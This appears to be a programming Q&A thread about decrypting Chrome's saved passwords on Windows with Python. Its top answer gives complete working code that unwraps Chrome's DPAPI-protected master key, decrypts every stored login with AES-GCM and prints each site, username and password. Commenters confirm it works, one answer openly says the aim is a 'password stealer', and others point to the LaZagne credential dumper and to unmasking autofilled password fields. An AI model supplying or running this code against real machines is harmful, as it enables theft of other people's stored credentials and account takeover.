# I have this error pywintypes.error: (87, 'CryptProtectData', 'Paramètre incorrect.') when i'm trying to decrypt chrome password in windows

Tags: python-3.x, sqlite, google-chrome, pywin32

Here is all of my code,I try to use this to decrypt chrome password in windows.

```
import os
import sqlite3
import win32crypt
def get_chrome():
    data_path = os.path.expanduser('~') + r'\AppData\Local\Google\Chrome\User Data\Default\Login Data'
    c = sqlite3.connect(data_path)
    cursor = c.cursor()
    select_statement = 'SELECT origin_url, username_value, password_value FROM logins'
    cursor.execute(select_statement)
    login_data = cursor.fetchall()

    cred = {}

    string = ''

    for url, user_name, pwd in login_data:
        pwd = win32crypt.CryptUnprotectData(pwd)
        cred[url] = (user_name, pwd[1].decode('utf8'))
        string += '\n[+] URL:%s USERNAME:%s PASSWORD:%s\n' % (url,user_name,pwd[1].decode('utf8'))
        print(string)


if __name__=='__main__':
    get_chrome()
```

And it shows error that is:

```
pywintypes.error: (87, 'CryptProtectData', 'Paramètre incorrect.') when i'm trying to decrypt chrome password in windows
```

Answer (score 5):

I'm assuming this is from w3w3w3 youtube's channel. I encountered the exact same problem as you, however, someone posted a solution to it:

```
 import os
 import json
 import base64
 import sqlite3
 import win32crypt
 from Cryptodome.Cipher import AES
 import shutil

 def get_master_key():
     with open(os.environ['USERPROFILE'] + os.sep + r'AppData\Local\Google\Chrome\User 
 Data\Local State', "r") as f:
         local_state = f.read()
         local_state = json.loads(local_state)
     master_key = base64.b64decode(local_state["os_crypt"]["encrypted_key"])
     master_key = master_key[5:]  # removing DPAPI
     master_key = win32crypt.CryptUnprotectData(master_key, None, None, None, 0)[1]
     return master_key

 def decrypt_payload(cipher, payload):
     return cipher.decrypt(payload)

 def generate_cipher(aes_key, iv):
     return AES.new(aes_key, AES.MODE_GCM, iv)

 def decrypt_password(buff, master_key):
     try:
         iv = buff[3:15]
         payload = buff[15:]
         cipher = generate_cipher(master_key, iv)
         decrypted_pass = decrypt_payload(cipher, payload)
         decrypted_pass = decrypted_pass[:-16].decode()  # remove suffix bytes
         return decrypted_pass
     except Exception as e:
         # print("Probably saved password from Chrome version older than v80\n")
         # print(str(e))
         return "Chrome < 80"
 

master_key = get_master_key()
login_db = os.environ['USERPROFILE'] + os.sep + r'AppData\Local\Google\Chrome\User Data\default\Login Data'
shutil.copy2(login_db, "Loginvault.db") #making a temp copy since Login Data DB is locked while Chrome is running
conn = sqlite3.connect("Loginvault.db")
cursor = conn.cursor()
try:
    cursor.execute("SELECT action_url, username_value, password_value FROM logins")
    for r in cursor.fetchall():
        url = r[0]
        username = r[1]
        encrypted_password = r[2]
        decrypted_password = decrypt_password(encrypted_password, master_key)
        if len(username) > 0:
            print("URL: " + url + "\nUser Name: " + username + "\nPassword: " + decrypted_password + "\n" + "*" * 50 + "\n")
except Exception as e:
    pass
cursor.close()
conn.close()
try:
    os.remove("Loginvault.db")
except Exception as e:
    pass
```

Comment: To use this, you need to "pip install PyCryptodome" and change line 6 into "from Crypto.Cipher import AES" - works great!!!

Comment: p.s. this only gets your new passwords - you still need to use the old code above to get any old passwords.

Answer (score 1):

I want to make a password stealer for chrome 
i don't know where is the probleme but i tried to run this script in cmd as an administraor but it's the same probeleme and i found many code that use the win32crypt lib and it give the same error 
it print the email and url but when i use the win32crypt.CryptUnprotectData it's give me an error

Answer (score 1):

Yes lazagne updated its code to fetch Chrome 80's logins.
But your code is missing the \User Data\Local State file.
This saves an encrypted ket (AES) needed to decrypt Login Data.
And this AES key is encrypted using win32crypt.CryptUnprotectData.
The Login Data encryption is AES256-CGM.

Answer (score 0):

Decrypting the Chrome Password now isn't Possible using the win32crypt module as google changed there encryption in chrome version 80 , so the best approach you can make is using Lazagane

Here : https://github.com/AlessandroZ/LaZagne

they updated there source code to decrypt the latest password encryption chrome , Hope i helped

Answer (score -1):

I can not comment.

"Paramètre incorrect.",it seems that your parameter is wrong,so it maybe means that your `pwd` can not be used to `win32crypt.CryptUnprotectData()`.

I have a idea to get the password in chrome easily.

Firstly,you could see the webpage which chrome remember your password.
And entering those pages,after chrome fill in with password.
Press F12,find the password `<input .... type="password"/>`,and change it to `<input .... type="text"/>` or delete `type` attribute.then you can see the password.